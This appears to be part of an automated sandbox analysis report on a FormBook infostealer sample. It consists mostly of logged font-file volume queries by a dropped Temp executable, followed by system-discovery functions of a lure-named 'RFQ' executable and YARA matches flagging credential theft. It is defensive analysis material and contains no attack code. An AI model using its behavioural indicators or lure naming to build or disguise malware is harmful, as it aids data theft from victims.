              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EA50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00EA50D7
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EB2230 GetUserNameW,0_2_00EB2230
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EA418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00EA418A
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E74AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E74AFE
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 1.2.svchost.exe.2500000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.xl9lsbb.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.xl9lsbb.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.2500000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4103858952.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4103945476.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3649278175.0000000005330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3649137742.00000000016B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
